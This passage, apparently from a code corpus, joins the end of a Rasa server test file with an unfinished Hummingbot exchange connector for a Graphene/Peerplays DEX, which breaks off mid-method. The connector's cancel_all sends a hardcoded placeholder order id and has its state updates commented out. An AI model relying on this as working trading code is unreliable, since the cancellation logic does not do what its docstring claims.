ActionExecuted(ACTION_SESSION_START_NAME, timestamp=1),
SessionStarted(timestamp=2),
UserUttered("hi", {"name": "greet"}, timestamp=3),
ActionExecuted("utter_greet", timestamp=4),
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=5),
SessionStarted(timestamp=6),
UserUttered("bye bye", {"name": "goodbye"}, timestamp=7),
ActionExecuted("utter_goodbye", timestamp=8),
],
4,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet""",
),
# empty conversation
([], None, True, 'version: "2.0"'),
# Conversation with slot
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
SlotSet(REQUESTED_SLOT, "some value"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet
- slot_was_set:
- requested_slot: some value""",
),
],
)
@pytest.mark.trains_model
async def test_get_story(
rasa_app: SanicASGITestClient,
monkeypatch: MonkeyPatch,
conversation_events: List[Event],
until_time: Optional[float],
fetch_all_sessions: Optional[bool],
expected: Text,
):
conversation_id = "some-conversation-ID"
tracker_store = InMemoryTrackerStore(Domain.empty())
tracker = DialogueStateTracker.from_events(conversation_id, conversation_events)
tracker_store.save(tracker)
monkeypatch.setattr(rasa_app.app.agent, "tracker_store", tracker_store)
url = f"/conversations/{conversation_id}/story?"
query = {}
if fetch_all_sessions is not None:
query["all_sessions"] = fetch_all_sessions
if until_time is not None:
query["until"] = until_time
_, response = await rasa_app.get(url + urllib.parse.urlencode(query))
assert response.status == HTTPStatus.OK
assert response.content.decode().strip() == expected
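# For illustration, with fetch_all_sessions=True and until_time=4 the request
# built above becomes (hypothetical values):
#   GET /conversations/some-conversation-ID/story?all_sessions=True&until=4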
@pytest.mark.trains_model
async def test_get_story_without_conversation_id(
rasa_app: SanicASGITestClient, monkeypatch: MonkeyPatch
):
conversation_id = "some-conversation-ID"
url = f"/conversations/{conversation_id}/story"
_, response = await rasa_app.get(url)
assert response.status == HTTPStatus.NOT_FOUND
assert response.json()["message"] == "Conversation ID not found."
@pytest.mark.trains_model
async def test_get_story_does_not_update_conversation_session(
rasa_app: SanicASGITestClient, monkeypatch: MonkeyPatch
):
conversation_id = "some-conversation-ID"
# domain with short session expiration time of one second
domain = Domain.empty()
domain.session_config = SessionConfig(
session_expiration_time=1 / 60, carry_over_slots=True
)
monkeypatch.setattr(rasa_app.app.agent, "domain", domain)
# conversation contains one session that has expired
now = time.time()
conversation_events = [
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=now - 10),
SessionStarted(timestamp=now - 9),
UserUttered("hi", {"name": "greet"}, timestamp=now - 8),
ActionExecuted("utter_greet", timestamp=now - 7),
]
tracker = DialogueStateTracker.from_events(conversation_id, conversation_events)
# the conversation session has expired
assert rasa_app.app.agent.create_processor()._has_session_expired(tracker)
tracker_store = InMemoryTrackerStore(domain)
tracker_store.save(tracker)
monkeypatch.setattr(rasa_app.app.agent, "tracker_store", tracker_store)
_, response = await rasa_app.get(f"/conversations/{conversation_id}/story")
assert response.status == HTTPStatus.OK
# expected story is returned
assert (
response.content.decode().strip()
== """version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet"""
)
# the tracker has the same number of events as were initially added
assert len(tracker.events) == len(conversation_events)
# the last event is still the same as before
assert tracker.events[-1].timestamp == conversation_events[-1].timestamp
@pytest.mark.parametrize(
"initial_tracker_events,events_to_append,expected_events",
[
(
# the tracker is initially empty, and no events are appended
# so we'll just expect the session start sequence with an `action_listen`
[],
[],
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
],
),
(
# the tracker is initially empty, and a user utterance is appended
# we expect a tracker with a session start sequence and a user utterance
[],
[UserUttered("/greet", {"name": "greet", "confidence": 1.0})],
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
],
),
(
# the tracker is initially empty, and a session start sequence is appended
# we'll just expect the session start sequence
[],
[ActionExecuted(ACTION_SESSION_START_NAME), SessionStarted()],
[ActionExecuted(ACTION_SESSION_START_NAME), SessionStarted()],
),
(
# the tracker already contains some events - we can simply append events
[
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
],
[ActionExecuted("utter_greet")],
[
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
ActionExecuted("utter_greet"),
],
),
],
)
@pytest.mark.trains_model
async def test_update_conversation_with_events(
rasa_app: SanicASGITestClient,
monkeypatch: MonkeyPatch,
initial_tracker_events: List[Event],
events_to_append: List[Event],
expected_events: List[Event],
):
conversation_id = "some-conversation-ID"
domain = Domain.empty()
tracker_store = InMemoryTrackerStore(domain)
monkeypatch.setattr(rasa_app.app.agent, "tracker_store", tracker_store)
if initial_tracker_events:
tracker = DialogueStateTracker.from_events(
conversation_id, initial_tracker_events
)
tracker_store.save(tracker)
fetched_tracker = await rasa.server.update_conversation_with_events(
conversation_id, rasa_app.app.agent.create_processor(), domain, events_to_append
)
assert list(fetched_tracker.events) == expected_events
|
graphene_exchange.py | # DISABLE SELECT PYLINT TESTS
# pylint: disable=bad-continuation, broad-except, no-member, too-many-lines
# pylint: disable=no-name-in-module, too-many-arguments, too-many-public-methods
# pylint: disable=too-many-locals, too-many-instance-attributes, import-error
# pylint: disable=too-many-statements, useless-super-delegation
"""
╔════════════════════════════════════════════════════╗
║ ╔═╗╦═╗╔═╗╔═╗╦ ╦╔═╗╔╗╔╔═╗ ╔╦╗╔═╗╔╦╗╔═╗╔╗╔╔═╗╔╦╗╔═╗ ║
║ ║ ╦╠╦╝╠═╣╠═╝╠═╣║╣ ║║║║╣ ║║║║╣ ║ ╠═╣║║║║ ║ ║║║╣ ║
║ ╚═╝╩╚═╩ ╩╩ ╩ ╩╚═╝╝╚╝╚═╝ ╩ ╩╚═╝ ╩ ╩ ╩╝╚╝╚═╝═╩╝╚═╝ ║
║ DECENTRALIZED EXCHANGE HUMMINGBOT CONNECTOR ║
╚════════════════════════════════════════════════════╝
~
forked from binance_exchange v1.0.0
~
"""
# STANDARD MODULES
import asyncio
import json
import logging
import time
from decimal import Decimal
from multiprocessing import Process
from threading import Thread
from typing import AsyncIterable, Dict, List, Optional
# METANODE MODULES
from metanode.graphene_metanode_client import GrapheneTrustlessClient
from metanode.graphene_metanode_server import GrapheneMetanode
# HUMMINGBOT MODULES
from hummingbot.connector.client_order_tracker import ClientOrderTracker
from hummingbot.connector.exchange.graphene import graphene_utils
from hummingbot.connector.exchange.graphene.graphene_api_order_book_data_source import \
GrapheneAPIOrderBookDataSource
from hummingbot.connector.exchange.graphene.graphene_auth import GrapheneAuth
from hummingbot.connector.exchange.graphene.graphene_constants import \
GrapheneConstants
from hummingbot.connector.exchange.graphene.graphene_order_book_tracker import \
GrapheneOrderBookTracker
from hummingbot.connector.exchange.graphene.graphene_user_stream_tracker import \
GrapheneUserStreamTracker
from hummingbot.connector.exchange_base import ExchangeBase
from hummingbot.connector.time_synchronizer import TimeSynchronizer
from hummingbot.connector.trading_rule import TradingRule
from hummingbot.core.data_type.cancellation_result import CancellationResult
from hummingbot.core.data_type.in_flight_order import (InFlightOrder,
OrderState, OrderUpdate,
TradeUpdate)
from hummingbot.core.data_type.limit_order import LimitOrder
from hummingbot.core.data_type.order_book import OrderBook
from hummingbot.core.data_type.trade_fee import (AddedToCostTradeFee,
DeductedFromReturnsTradeFee,
TokenAmount, TradeFeeBase)
from hummingbot.core.event.events import OrderType, TradeType
from hummingbot.core.network_iterator import NetworkStatus
from hummingbot.core.utils.async_utils import safe_ensure_future
from hummingbot.logger import HummingbotLogger
# GLOBAL CONSTANTS
DEV = False
def dprint(*data):
"""print for development"""
if DEV:
print(*data)
def dinput(data):
"""input for development"""
out = None
if DEV:
out = input(data)
return out
class GrapheneClientOrderTracker(ClientOrderTracker):
"""
add swap_order_id method to ClientOrderTracker
"""
def __init__(
self,
connector,
):
# ~ print("GrapheneClientOrderTracker")
super().__init__(connector)
def swap_id(
self,
client_order_id: Optional[str] = None,
exchange_order_id: Optional[str] = None,
) -> str:
"""
given client_order_id return exchange_order_id
given exchange_order_id return client_order_id
"""
if client_order_id and client_order_id in self.all_orders:
return self.all_orders[client_order_id].exchange_order_id
if exchange_order_id:
for order in self.all_orders.values():
if order.exchange_order_id == exchange_order_id:
return order.client_order_id
return None
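# A minimal usage sketch of swap_id (illustrative only; the tracker instance
# and the order ids below are hypothetical, not part of this module):
# ~ tracker = GrapheneClientOrderTracker(connector=exchange)
# ~ tracker.swap_id(client_order_id="buy-BTC-USD-123")  # -> e.g. "1.7.456"
# ~ tracker.swap_id(exchange_order_id="1.7.456")        # -> "buy-BTC-USD-123"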
class GrapheneExchange(ExchangeBase):
"""
the master class which ties together all DEX connector components
"""
# FIXME move to hummingbot constants
SHORT_POLL_INTERVAL = 5.0
UPDATE_ORDER_STATUS_MIN_INTERVAL = 10.0
LONG_POLL_INTERVAL = 120.0
_logger: Optional[HummingbotLogger] = None
def __init__(
self,
peerplays_wif: str,
domain: str = "peerplays",
trading_pairs: Optional[List[str]] = None,
trading_required: bool = True,
):
# ~ print(__class__.__name__)
# ~ print(
# ~ "GrapheneExchange", peerplays_wif, domain, trading_pairs, trading_required
# ~ )
self._time_synchronizer = TimeSynchronizer()
        self.domain = domain
        super().__init__()
self._wif = peerplays_wif
self._trading_pairs = trading_pairs
self._trading_required = trading_required
self._ev_loop = asyncio.get_event_loop()
self._poll_notifier = asyncio.Event()
# Dict[client_order_id:str, count:int]
self._order_not_found_records = {}
# Dict[trading_pair:str, TradingRule]
self._trading_rules = {}
# Dict[trading_pair:str, (maker_fee_percent:Dec, taker_fee_percent:Dec)]
self._trade_fees = {}
self._user_stream_event_listener_task = None
self._trading_rules_polling_task = None
self._user_stream_tracker_task = None
self._status_polling_task = None
self._metanode_process = None
self._last_timestamp = 0
self._last_poll_timestamp = 0
self._last_update_trade_fees_timestamp = 0
self._last_trades_poll_graphene_timestamp = 0
# initialize Graphene class objects
self.constants = GrapheneConstants(domain)
self.metanode = GrapheneTrustlessClient(self.constants)
self._metanode_server = GrapheneMetanode(self.constants)
self._order_tracker: ClientOrderTracker = GrapheneClientOrderTracker(
connector=self
)
self._order_book_tracker = GrapheneOrderBookTracker(
trading_pairs=trading_pairs,
domain=domain,
)
self._user_stream_tracker = GrapheneUserStreamTracker(
domain=domain,
order_tracker=self._order_tracker,
)
self._auth = GrapheneAuth(
wif=peerplays_wif,
domain=self.domain,
)
msg = (
"Authenticated" if self._auth.login()["result"] is True else "Login Failed"
)
self.dev_log(msg)
def dev_log(self, *args, **kwargs):
"""
log only in dev mode
"""
if DEV:
self.logger().info(*args, **kwargs)
@classmethod
def logger(cls) -> HummingbotLogger:
"""
a classmethod for logging
"""
if cls._logger is None:
cls._logger = logging.getLogger(__name__)
return cls._logger
@property
def name(self) -> str:
"""
the name of this graphene blockchain
"""
# self.dev_log("name")
return self.domain
@property
def order_books(self) -> Dict[str, OrderBook]:
"""
a dictionary keyed by pair of subdicts keyed bids/asks
"""
# self.dev_log("order_books")
return self._order_book_tracker.order_books
@property
def trading_rules(self) -> Dict[str, TradingRule]:
"""
a TradingRule object specific to a trading pair
"""
# self.dev_log("trading_rules")
return self._trading_rules
@property
def in_flight_orders(self) -> Dict[str, InFlightOrder]:
"""
a dict of active orders keyed by client id with relevant order tracking info
"""
# self.dev_log("in_flight_orders")
return self._order_tracker.active_orders
@property
def limit_orders(self) -> List[LimitOrder]:
"""
a list of LimitOrder objects
"""
# self.dev_log("limit_orders")
return [
in_flight_order.to_limit_order()
for in_flight_order in self.in_flight_orders.values()
]
@property
def tracking_states(self) -> Dict[str, any]:
"""
Returns a dictionary associating current active orders client id
to their JSON representation
"""
# self.dev_log("tracking_states")
return {key: value.to_json() for key, value in self.in_flight_orders.items()}
@property
def order_book_tracker(self) -> GrapheneOrderBookTracker:
"""
the class that tracks bids and asks for each pair
"""
# self.dev_log("order_book_tracker")
return self._order_book_tracker
@property
def user_stream_tracker(self) -> GrapheneUserStreamTracker:
"""
the class that tracks trades for each pair
"""
# self.dev_log("user_stream_tracker")
return self._user_stream_tracker
@property
def status_dict(self) -> Dict[str, bool]:
"""
Returns a dictionary with the values of all the conditions
that determine if the connector is ready to operate.
The key of each entry is the condition name,
and the value is True if condition is ready, False otherwise.
"""
# self.dev_log("status_dict")
# self._update_balances()
# ~ self.dev_log(self._account_balances)
return {
"symbols_mapping_initialized": (
GrapheneAPIOrderBookDataSource.trading_pair_symbol_map_ready(
domain=self.domain
)
),
"order_books_initialized": self._order_book_tracker.ready,
"account_balance": len(list(self._account_balances.values())) > 0
if self._trading_required
else True,
"trading_rule_initialized": len(self._trading_rules) > 0,
"metanode_live": 0 < time.time() - self.metanode.timing["blocktime"] < 100,
}
@property
def ready(self) -> bool:
"""
Returns True if the connector is ready to operate
(all connections established with the DEX).
If it is not ready it returns False.
"""
# self.dev_log("ready")
# ~ self.dev_log(self.status_dict)
return all(self.status_dict.values())
@staticmethod
def graphene_order_type(order_type: OrderType) -> str:
"""
LIMIT
"""
return order_type.name.upper()
@staticmethod
def to_hb_order_type(graphene_type: str) -> OrderType:
"""
OrderType.LIMIT
"""
return OrderType[graphene_type]
@staticmethod
def supported_order_types():
"""
a list containing only OrderType.LIMIT
"""
return [OrderType.LIMIT]
async def start_network(self):
"""
Start all required tasks to update the status of the connector.
Those tasks include:
- The order book tracker
- The polling loop to update the trading rules
- The polling loop to update order status and balance status using REST API
(backup for main update process)
"""
dprint("GrapheneExchange.start_network")
self._order_book_tracker.start()
dprint("Order Book Started")
self._trading_rules_polling_task = safe_ensure_future(
self._trading_rules_polling_loop()
)
dprint("Trading Rules Started")
# ~ if self._trading_required:
self._status_polling_task = safe_ensure_future(self._status_polling_loop())
dprint("Status Polling Started")
self._user_stream_tracker_task = safe_ensure_future(
self._user_stream_tracker.start()
)
dprint("User Stream Tracker Started")
self._user_stream_event_listener_task = safe_ensure_future(
self._user_stream_event_listener()
)
dprint("User Stream Listener Started")
async def stop_network(self):
"""
This function is executed when the connector is stopped.
        It performs a general cleanup and stops all background
tasks that require the connection with the DEX to work.
"""
self.dev_log("GrapheneExchange.stop_network")
self.dev_log("Waiting for cancel_all...")
await asyncio.sleep(30)
self._last_timestamp = 0
self._last_poll_timestamp = 0
self._order_book_tracker.stop()
self._poll_notifier = asyncio.Event()
if self._status_polling_task is not None:
self._status_polling_task.cancel()
if self._user_stream_tracker_task is not None:
self._user_stream_tracker_task.cancel()
if self._trading_rules_polling_task is not None:
self._trading_rules_polling_task.cancel()
self._status_polling_task = self._user_stream_tracker_task = None
try:
            if self._metanode_process is not None:
                # terminate the Metanode server process, then wait for it to exit
                self._metanode_process.terminate()
                self._metanode_process.join()
except Exception as error:
self.dev_log("it appears there is no Metanode process to terminate")
self.dev_log(error)
async def check_network(self) -> NetworkStatus:
"""
        ensure metanode blocktime is not stale; if it is, restart the metanode
"""
# self.dev_log("check_network")
status = NetworkStatus.NOT_CONNECTED
self.dev_log("Checking Network...")
try:
            # if the metanode is less than one minute stale, we're connected
# in practice, once live it should always pass this test
blocktime = self.metanode.timing["blocktime"]
latency = time.time() - blocktime
if 0 < latency < 60:
msg = f"Metanode Connected, latency {latency:.2f}"
self.dev_log(msg)
status = NetworkStatus.CONNECTED
# otherwise attempt to restart the metanode; eg. on startup
else:
self.dev_log("Deploying Metanode Server Process, please wait...")
self.dev_log(
"ALERT: Check your system monitor to ensure hardware compliance, "
"Metanode is cpu intensive, requires ram, and rapid read/write"
)
try:
                    self._metanode_process.terminate()
                    self._metanode_process.join()
except Exception:
pass
self._metanode_process = Process(target=self._metanode_server.deploy)
self._metanode_process.start()
# do not proceed until metanode is running
patience = 11
while True:
patience -= 1
msg = f"Metanode Server Initializing... patience={patience}"
if patience == -10:
msg = (
"I am out of patience.\n"
+ "It appears Metanode FAILED, check configuration and that"
+ " DEV mode is off."
)
self.dev_log(msg)
status = NetworkStatus.NOT_CONNECTED
break
self.dev_log(msg)
try:
# wait until less than one minute stale
blocktime = self.metanode.timing["blocktime"]
latency = time.time() - blocktime
if 0 < latency < 60:
msg = f"Metanode Connected, latency {latency:.2f}"
self.dev_log(msg)
status = NetworkStatus.CONNECTED
await asyncio.sleep(10)
break
except Exception as error:
self.dev_log(error)
await asyncio.sleep(6)
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
except Exception as error:
msg = f"check network failed {__name__} {error.args}"
self.logger().exception(msg)
return status
def restore_tracking_states(self, saved_states: Dict[str, any]):
"""
Restore in-flight orders from saved tracking states,
        this is so the connector can pick up where it left off
when it disconnects.
:param saved_states: The saved tracking_states.
"""
# self.dev_log("restore_tracking_states")
self._order_tracker.restore_tracking_states(tracking_states=saved_states)
def tick(self, timestamp: float):
"""
Includes the logic processed every time a new tick happens in the bot.
It enables execution of the status update polling loop using an event.
"""
self.dev_log("tick")
now = time.time()
poll_interval = (
self.SHORT_POLL_INTERVAL
if now - self.user_stream_tracker.last_recv_time > 60.0
else self.LONG_POLL_INTERVAL
)
last_tick = int(self._last_timestamp / poll_interval)
current_tick = int(timestamp / poll_interval)
if current_tick > last_tick:
if not self._poll_notifier.is_set():
self._poll_notifier.set()
self._last_timestamp = timestamp
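    # Worked example of the bucketing above (illustrative numbers): with
    # poll_interval = 5.0, a previous timestamp of 12.3 falls in bucket
    # int(12.3 / 5.0) == 2; a new timestamp of 15.1 falls in bucket 3, so the
    # poll notifier is set, while 14.9 stays in bucket 2 and triggers nothing.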
def get_order_book(self, trading_pair: str) -> OrderBook:
"""
Returns the current order book for a particular market
:param trading_pair: BASE-QUOTE
"""
# self.dev_log("get_order_book")
if trading_pair not in self._order_book_tracker.order_books:
raise ValueError(f"No order book exists for '{trading_pair}'.")
return self._order_book_tracker.order_books[trading_pair]
def start_tracking_order(
self,
order_id: str,
exchange_order_id: Optional[str],
trading_pair: str,
trade_type: TradeType,
price: Decimal,
amount: Decimal,
order_type: OrderType,
):
"""
Starts tracking an order by adding it to the order tracker.
:param order_id: the order identifier
:param exchange_order_id: the identifier for the order in the DEX
:param trading_pair: BASE-QUOTE
:param trade_type: the type of order (buy or sell)
:param price: the price for the order
:param amount: the amount for the order
        :param order_type: type of execution for the order (MARKET, LIMIT, LIMIT_MAKER)
"""
# self.dev_log("start_tracking_order")
self._order_tracker.start_tracking_order(
InFlightOrder(
client_order_id=order_id,
exchange_order_id=exchange_order_id,
trading_pair=trading_pair,
order_type=order_type,
trade_type=trade_type,
amount=amount,
price=price,
)
)
def stop_tracking_order(self, order_id: str):
"""
Stops tracking an order
:param order_id: The id of the order that will not be tracked any more
"""
# self.dev_log("stop_tracking_order")
self._order_tracker.stop_tracking_order(client_order_id=order_id)
def get_order_price_quantum(self, trading_pair: str, *_) -> Decimal:
"""
Used by quantize_order_price() in _limit_order_create()
Returns a price step, a minimum price increment for a given trading pair.
:param trading_pair: the trading pair to check for market conditions
:param price: the starting point price
"""
# self.dev_log("get_order_price_quantum")
trading_rule = self._trading_rules[trading_pair]
return trading_rule.min_price_increment
def get_order_size_quantum(self, trading_pair: str, *_) -> Decimal:
"""
        Used by quantize_order_amount() in _limit_order_create()
Returns an order amount step, a minimum amount increment for a given pair.
:param trading_pair: the trading pair to check for market conditions
        :param order_size: the starting point order size
"""
# self.dev_log("get_order_size_quantum")
trading_rule = self._trading_rules[trading_pair]
return trading_rule.min_base_amount_increment
def quantize_order_amount(
self,
trading_pair: str,
amount: Decimal,
price: Decimal = Decimal(0),
) -> Decimal:
"""
Applies the trading rules to calculate the correct order amount for the market
:param trading_pair: the token pair for which the order will be created
:param amount: the intended amount for the order
:param price: the intended price for the order
:return: the quantized order amount after applying the trading rules
"""
# self.dev_log("quantize_order_amount")
trading_rule = self._trading_rules[trading_pair]
quantized_amount: Decimal = super().quantize_order_amount(trading_pair, amount)
# Check against min_order_size and min_notional_size.
# If not passing either check, return 0.
if quantized_amount < trading_rule.min_order_size:
return Decimal(0)
if price == Decimal(0):
current_price: Decimal = self.get_price(trading_pair, False)
notional_size = current_price * quantized_amount
else:
notional_size = price * quantized_amount
# Add 1% as a safety factor in case the prices changed while making the order.
if notional_size < trading_rule.min_notional_size * Decimal("1.01"):
return Decimal(0)
return quantized_amount
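    # Worked example (illustrative numbers): with min_order_size = 0.001 and
    # min_notional_size = 10, an order of 0.5 at price 30 has notional 15,
    # which clears 10 * 1.01 == 10.1, so 0.5 is returned; the same amount at
    # price 20 has notional 10 < 10.1 and is quantized to Decimal(0).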
def get_fee(
self,
base_currency: str,
quote_currency: str,
_,# ~ order_type: OrderType,
order_side: TradeType, # TradeType.BUY TradeType.SELL
__,# ~ amount: Decimal,
___,# ~ price: Decimal = Decimal("nan"),
is_maker: Optional[bool] = None,
) -> TradeFeeBase:
"""
Calculates the estimated fee an order would pay
        Graphene fees include an added flat transaction fee paid in core token 1.3.0
        AND deducted percent-based market fees paid in the currency RECEIVED;
        market fees MAY have maker/taker functionality
"""
class GrapheneTradeFee(TradeFeeBase):
"""
a trade fee class which includes both Added and Deducted fees
"""
def get_fee_impact_on_order_cost(_):
"""
Added Fees
"""
return AddedToCostTradeFee.get_fee_impact_on_order_cost
def get_fee_impact_on_order_returns(_):
"""
Deducted Fees
"""
return DeductedFromReturnsTradeFee.get_fee_impact_on_order_returns
# self.dev_log("get_fee")
account = dict(self.metanode.account) # DISCRETE SQL QUERY
objects = dict(self.metanode.objects) # DISCRETE SQL QUERY
assets = dict(self.metanode.assets) # DISCRETE SQL QUERY
tx_currency = objects["1.3.0"]["name"]
tx_amount = account["fees_account"]["create"]
# you pay trade fee on the currency you receive in the transaction
trade_currency = quote_currency
maker_pct = assets[quote_currency]["fees_asset"]["fees"]["maker"]
taker_pct = assets[quote_currency]["fees_asset"]["fees"]["taker"]
if order_side == TradeType.BUY:
trade_currency = base_currency
maker_pct = assets[base_currency]["fees_asset"]["fees"]["maker"]
taker_pct = assets[base_currency]["fees_asset"]["fees"]["taker"]
trade_pct = maker_pct if is_maker else taker_pct
# build a TradeFeeBase class object
flat_fee = TokenAmount(token=tx_currency, amount=Decimal(tx_amount))
fee = GrapheneTradeFee(
flat_fees=[flat_fee],
percent=Decimal(trade_pct),
# handle TradeFeeBase warning; do not specify token if its quote token
percent_token=trade_currency if trade_currency != quote_currency else None,
)
################################################################################
# FIXME the hummingbot binance reference is a path to deprecation warning
################################################################################
# there appears to be no functional reference material, see:
# ~
# ~ BitshareExchange
## ~ ExchangeBase
### ~ ConnectorBase
#### ~ estimate_fee_pct
##### ~ core.utils.estimate_fee.estimate_fee < binance ends here not implemented
################################################################################
# FIXME just return ZERO like this? peer review please
# return DeductedFromReturnsTradeFee(percent=self.estimate_fee_pct(False))
################################################################################
return fee
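    # A hedged usage sketch (asset names and values below are hypothetical):
    # ~ fee = exchange.get_fee("BTC", "USD", OrderType.LIMIT, TradeType.BUY,
    # ~                        Decimal(1), Decimal("50000"), is_maker=True)
    # ~ fee.flat_fees[0]  # core-token transaction fee as a TokenAmount
    # ~ fee.percent       # maker percent charged on the currency received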
def buy(
self,
trading_pair: str,
amount: Decimal,
order_type: OrderType = OrderType.LIMIT,
price: Decimal = Decimal("nan"),
**__,
) -> str:
"""
Creates a promise to create a buy order using the parameters.
:param trading_pair: the token pair to operate with
:param amount: the order amount
:param order_type: all graphene orders are LIMIT type
:param price: the order price
:return: the id assigned by the connector to the order (the client id)
"""
# self.dev_log("buy")
order_id = graphene_utils.get_new_client_order_id(
is_buy=True, trading_pair=trading_pair
)
safe_ensure_future(
self._limit_order_create(
TradeType.BUY, order_id, trading_pair, amount, order_type, price
)
)
return order_id
def sell(
self,
trading_pair: str,
amount: Decimal,
order_type: OrderType = OrderType.LIMIT,
price: Decimal = Decimal("nan"),
**__,
) -> str:
"""
Creates a promise to create a sell order using the parameters.
:param trading_pair: the token pair to operate with
:param amount: the order amount
:param order_type: all graphene orders are LIMIT type
:param price: the order price
:return: the id assigned by the connector to the order (the client id)
"""
# self.dev_log("sell")
order_id = graphene_utils.get_new_client_order_id(
is_buy=False, trading_pair=trading_pair
)
safe_ensure_future(
self._limit_order_create(
TradeType.SELL, order_id, trading_pair, amount, order_type, price
)
)
return order_id
def cancel(self, trading_pair: str, order_id: str):
"""
Creates a promise to cancel an order in the DEX
:param trading_pair: the trading pair the order to cancel operates with
:param order_id: the client id of the order to cancel
:return: the client id of the order to cancel
"""
# self.dev_log("cancel")
safe_ensure_future(
self._limit_order_cancel(
trading_pair=trading_pair,
client_order_id=order_id,
)
)
return order_id
async def cancel_all(self, _) -> List[CancellationResult]:
"""
Cancels all currently active orders.
The cancellations are batched at the core level into groups of 20 per tx
Used by bot's top level stop and exit commands
(cancelling outstanding orders on exit)
:param timeout_seconds: the maximum time in seconds the cancel logic should run
:return: a list of CancellationResult instances, one for each of the order
"""
# self.dev_log("cancel_all")
# get an order id set of known open orders hummingbot is tracking
# change each OrderState to PENDING_CANCEL
await asyncio.sleep(0.01)
open_client_ids = {
o.client_order_id for o in self.in_flight_orders.values() if not o.is_done
}
await asyncio.sleep(0.01)
msg = f"open_client_ids {len(open_client_ids)} {open_client_ids}"
self.dev_log(msg)
open_exchange_ids = {
self._order_tracker.swap_id(i)
for i in open_client_ids
if self._order_tracker.swap_id(i) is not None
}
open_ids = {
self._order_tracker.swap_id(i): i
for i in open_client_ids
if self._order_tracker.swap_id(i) is not None
}
await asyncio.sleep(0.01)
# log open orders in client and DEX terms
msg = f"open_exchange_ids {len(open_exchange_ids)} {open_exchange_ids}"
self.dev_log(msg)
await asyncio.sleep(0.01)
for order_id in open_client_ids:
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
trading_pair=self.in_flight_orders[order_id].trading_pair,
update_timestamp=int(time.time() * 1e3),
new_state=OrderState.PENDING_CANCEL,
)
self._order_tracker.process_order_update(order_update)
await asyncio.sleep(0.01)
cancelled_exchange_ids = []
for pair in self._trading_pairs:
# build a cancel all operation using the broker(order) method
order = json.loads(self._auth.prototype_order(pair))
# order["edicts"] = [{"op": "cancel", "ids": list(open_exchange_ids)}]
order["edicts"] = [{"op": "cancel", "ids": ["1.7.X"]}]
await asyncio.sleep(0.01)
# cancel all and get a cancellation result list of DEX order ids
self.dev_log(order)
cancelled_exchange_ids.extend((await self._broker(order))["result"])
# cancelled_exchange_ids.extend(self._auth.broker(order))
# ~ signal = Value("i", 0)
# ~ auth = Value("i", 0)
# ~ manager = Manager()
# ~ trx_data = manager.Value(ctypes.c_wchar_p, "")
# ~ self.dev_log(order)
# ~ self.dev_log(signal.value)
# ~ cancelled_exchange_ids = self._auth._execute(signal, auth, trx_data, order)
# ~ self.dev_log(signal.value)
# ~ while not signal.value:
# ~ await asyncio.sleep(1)
# ~ self.dev_log(signal.value)
# ~ self.dev_log("Waiting for manualSIGNING")
# ~ self.dev_log(signal.value)
# ~ self.dev_log(trx_data.value)
# ~ cancelled_exchange_ids = cancelled_exchange_ids["result"]
msg = (
f"cancelled_exchange_ids {len(cancelled_exchange_ids)}"
+ f" {cancelled_exchange_ids}"
)
self.dev_log(msg)
# swap the list to hummingbot client ids
cancelled_client_ids = [open_ids[i] for i in cancelled_exchange_ids]
await asyncio.sleep(0.01)
# log cancelled orders in client and DEX terms
msg = f"cancelled_client_ids {len(cancelled_client_ids)} {cancelled_client_ids}"
self.dev_log(msg)
await asyncio.sleep(0.01)
# create a list of successful CancellationResult
# change each OrderState to CANCELLED
successful_cancellations = []
for order_id in cancelled_client_ids:
successful_cancellations.append(CancellationResult(order_id, True))
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
trading_pair=self.in_flight_orders[order_id].trading_pair,
update_timestamp=int(time.time() * 1e3),
new_state=OrderState.CANCELLED,
)
# ~ self._order_tracker.process_order_update(order_update)
msg = (
f"successful_cancellations {len(successful_cancellations)}"
+ f" {successful_cancellations}"
)
self.dev_log(msg)
# create a list of apparently failed CancellationResult
# change each OrderState back to OPEN
await asyncio.sleep(0.01)
failed_cancellations = []
for order_id in open_client_ids: # client order ids
if order_id not in cancelled_client_ids:
failed_cancellations.append(CancellationResult(order_id, False))
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
trading_pair=self.in_flight_orders[order_id].trading_pair,
update_timestamp=int(time.time() * 1e3),
new_state=OrderState.OPEN,
)
# ~ self._order_tracker.process_order_update(order_update)
await asyncio.sleep(0.01)
# log successful and failed cancellations
msg = (
f"failed_cancellations {len(failed_cancellations)}"
+ f" {failed_cancellations}"
)
self.dev_log(msg)
await asyncio.sleep(0.01)
# join the lists and return
return successful_cancellations + failed_cancellations
async def _broker(self, order):
self.dev_log("self._broker")
ret = {}
        broker_thread = Thread(
            target=self._auth.broker,
            args=(
                order,
                ret,
            ),
        )
        broker_thread.start()
self.dev_log(ret)
while not ret:
await asyncio.sleep(1)
self.dev_log("Waiting for manualSIGNING")
self.dev_log(ret)
return ret
async def _limit_order_create(
self,
trade_type: TradeType,
order_id: str,
trading_pair: str,
amount: Decimal,
order_type: OrderType,
price: Optional[Decimal] = Decimal("NaN"),
):
"""
        Creates an order in the DEX using the parameters to configure it
        :param trade_type: the side of the order (BUY or SELL)
:param order_id: the id that should be assigned to the order (the client id)
:param trading_pair: the token pair to operate with
:param amount: the order amount
:param order_type: the type of order to create (MARKET, LIMIT, LIMIT_MAKER)
:param price: the order price
"""
# self.dev_log("_limit_order_create")
